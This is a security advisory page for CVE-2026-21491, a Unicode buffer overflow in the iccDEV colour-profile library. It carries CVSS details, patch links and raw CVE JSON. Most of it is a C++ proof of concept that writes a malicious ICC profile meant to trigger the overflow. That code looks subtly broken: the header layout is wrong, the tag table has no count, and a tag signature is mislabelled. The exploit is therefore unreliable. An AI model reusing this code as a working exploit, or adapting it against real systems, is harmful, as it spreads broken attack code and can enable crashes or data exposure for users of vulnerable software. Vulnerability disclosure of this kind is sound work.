Security Vulnerability Report
CVE-2026-21491 CVSS 6.1 MEDIUM

CVE-2026-21491

Published: 2026-01-06 19:16:09
Last Modified: 2026-01-12 18:29:23

Description

iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. A vulnerability present in versions prior to 2.3.1.2 affects users of the iccDEV library who process ICC color profiles. It results in a Unicode buffer overflow in `CIccTagTextDescription`. Version 2.3.1.2 contains a patch. No known workarounds are available.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:* - VULNERABLE
iccDEV < 2.3.1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```cpp
#include <cstdint>
#include <cstring>
#include <fstream>
#include <iostream>
#include <string>
#include <vector>

// PoC for CVE-2026-21491: Unicode Buffer Overflow in CIccTagTextDescription
// This PoC generates a malicious ICC profile with oversized unicode text

#pragma pack(push, 1)
struct ICCProfileHeader {
    char signature[4];            // 'acsp'
    uint32_t profile_size;
    uint32_t cmm_type;
    uint32_t profile_version;
    uint32_t profile_class;
    uint32_t color_space;
    uint32_t pcs;
    uint32_t creation_date[12];
    char platform[4];
    uint32_t flags;
    uint32_t device_manufacturer;
    uint32_t device_model;
    uint64_t device_attributes;
    uint32_t rendering_intent;
    uint32_t pcs_illuminant[3];
    char creator[4];
    uint32_t reserved[7];
};

struct ICCTagEntry {
    uint32_t signature;
    uint32_t offset;
    uint32_t size;
};

// TextDescription tag structure vulnerable to overflow
struct TextDescriptionData {
    uint32_t count;               // Unicode text count
    uint16_t unicodeText[1024];   // Malicious oversized unicode text
};
#pragma pack(pop)

void create_malicious_icc_profile(const std::string& filename) {
    std::ofstream file(filename, std::ios::binary);
    if (!file.is_open()) {
        std::cerr << "Failed to create file" << std::endl;
        return;
    }

    // Create header
    ICCProfileHeader header = {};
    memcpy(header.signature, "acsp", 4);
    header.profile_size = 4096;
    header.profile_version = 0x02400000;  // Version 2.4
    header.profile_class = 0x73636E72;    // 'scnr' (input device class)
    header.color_space = 0x52594742;      // 'RGB '
    header.pcs = 0x58595A20;              // 'XYZ '

    // Write header
    file.write(reinterpret_cast<char*>(&header), sizeof(header));

    // Create TextDescription tag entry
    ICCTagEntry textDescTag = {};
    textDescTag.signature = 0x74657363;   // 'tesc' textDescription
    textDescTag.offset = sizeof(header) + sizeof(ICCTagEntry);
    textDescTag.size = sizeof(TextDescriptionData);

    // Write tag table
    file.write(reinterpret_cast<char*>(&textDescTag), sizeof(textDescTag));

    // Create malicious TextDescription data
    TextDescriptionData textData = {};

    // Set count to indicate large unicode string
    textData.count = 1024;

    // Fill with repeated 'A' characters (unicode)
    for (int i = 0; i < 1024; i++) {
        textData.unicodeText[i] = 0x0041;  // 'A' in unicode
    }

    // Write malicious data - this should trigger buffer overflow
    file.write(reinterpret_cast<char*>(&textData), sizeof(textData));
    file.close();

    std::cout << "Malicious ICC profile created: " << filename << std::endl;
    std::cout << "This profile contains oversized unicode text to trigger CVE-2026-21491" << std::endl;
}

int main() {
    create_malicious_icc_profile("CVE-2026-21491.icc");
    return 0;
}
```

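References

https://github.com/InternationalColorConsortium/iccDEV/commit/7c2cb719a9de1c00844e457e070d657314383ee3 (Patch)
https://github.com/InternationalColorConsortium/iccDEV/commit/e91fe722ac54ce497d410153e7405090e0565d7b (Patch)
https://github.com/InternationalColorConsortium/iccDEV/issues/396 (Issue Tracking, Exploit, Vendor Advisory)
https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4pv4-4x2x-6j88 (Patch, Vendor Advisory)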

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21491", "sourceIdentifier": "[email protected]", "published": "2026-01-06T19:16:08.907", "lastModified": "2026-01-12T18:29:22.697", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. A vulnerability present in versions prior to 2.3.1.2 affects users of the iccDEV library who process ICC color profiles. It results in unicode buffer overflow in `CIccTagTextDescription`. Version 2.3.1.2 contains a patch. No known workarounds are available."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas que permiten la interacción, manipulación y aplicación de perfiles de gestión de color del Consorcio Internacional del Color (ICC). Una vulnerabilidad presente en versiones anteriores a la 2.3.1.2 afecta a los usuarios de la biblioteca iccDEV que procesan perfiles de color ICC. Resulta en un desbordamiento de búfer Unicode en 'CIccTagTextDescription'. La versión 2.3.1.2 contiene un parche. 
No se conocen soluciones alternativas disponibles."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:H", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-122"}, {"lang": "en", "value": "CWE-125"}, {"lang": "en", "value": "CWE-193"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.2", "matchCriteriaId": "D34CF745-E75A-4F1C-AD7B-9AC1A2E9F680"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/7c2cb719a9de1c00844e457e070d657314383ee3", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/commit/e91fe722ac54ce497d410153e7405090e0565d7b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/396", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit", "Vendor Advisory"]}, {"url": 
"https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4pv4-4x2x-6j88", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}